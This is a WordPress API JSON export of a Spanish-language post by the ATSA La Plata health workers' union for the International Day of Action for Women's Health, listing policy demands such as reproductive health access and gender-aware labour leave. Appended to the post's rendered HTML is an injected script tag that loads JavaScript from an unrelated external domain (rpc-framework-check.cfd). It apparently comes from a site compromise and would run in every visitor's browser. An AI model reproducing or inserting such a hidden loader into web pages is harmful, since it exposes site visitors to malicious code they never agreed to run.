{"id":18498,"date":"2025-05-28T00:00:00","date_gmt":"2025-05-28T03:00:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18498"},"modified":"2026-02-02T17:04:47","modified_gmt":"2026-02-02T20:04:47","slug":"dia-internacional-de-accion-por-la-salud-de-las-mujeres-2","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/05\/dia-internacional-de-accion-por-la-salud-de-las-mujeres-2\/","title":{"rendered":"D\u00eda Internacional de Acci\u00f3n por la Salud de las Mujeres"},"content":{"rendered":"\n<p>Esta fecha fue establecida en 1987 por la Red de Salud de las Mujeres Latinoamericanas y del Caribe (RSMLAC) durante una reuni\u00f3n en Costa Rica. Desde entonces, organizaciones feministas, sociales y sindicales de todo el mundo levantamos la voz cada 28 de mayo para exigir el reconocimiento y la garant\u00eda del derecho a una salud integral, universal y con perspectiva de g\u00e9nero.<\/p>\n\n\n\n<p>La elecci\u00f3n de este d\u00eda surgi\u00f3 como respuesta a las graves consecuencias que tienen para las mujeres las pol\u00edticas sanitarias excluyentes, la violencia obst\u00e9trica, la falta de acceso a la salud sexual y reproductiva, y la invisibilizaci\u00f3n de las problem\u00e1ticas espec\u00edficas que atraviesan sus cuerpos y sus vidas.<\/p>\n\n\n\n<p>Como organizaci\u00f3n de la Sanidad venimos asumiendo estos desaf\u00edos porque sabemos que las condiciones laborales, la sobrecarga de tareas de cuidado, la violencia de g\u00e9nero y las desigualdades estructurales afectan de manera directa la salud f\u00edsica y mental de las trabajadoras.<\/p>\n\n\n\n<p>\ud83d\udc49 Necesitamos pol\u00edticas p\u00fablicas que garanticen:<\/p>\n\n\n\n<p>Acceso a la salud sexual y (no) reproductiva<\/p>\n\n\n\n<p>Licencias laborales acordes a los ciclos vitales de las mujeres y personas gestantes<\/p>\n\n\n\n<p>Espacios de trabajo libres de violencia y discriminaci\u00f3n<\/p>\n\n\n\n<p>Perspectiva de g\u00e9nero en todo el sistema de salud<\/p>\n\n\n\n<p>Sin salud no hay derechos, y sin derechos no hay justicia social.<\/p>\n\n\n\n<p>Secretaria de la Mujer, Karina Rodr\u00edguez.<\/p>\n\n\n\n<p>#28DeMayo #SaludDeLasMujeres #DerechosLaborales #SaludConEquidad #SanidadATSALaPlata #SiempreJuntoAVos<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Esta fecha fue establecida en 1987 por la Red de Salud de las Mujeres Latinoamericanas&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18499,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,97,119,85,148],"tags":[],"class_list":["post-18498","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-la-mujer","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18498","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18498"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18498\/revisions"}],"predecessor-version":[{"id":20805,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18498\/revisions\/20805"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18499"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18498"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18498"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18498"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}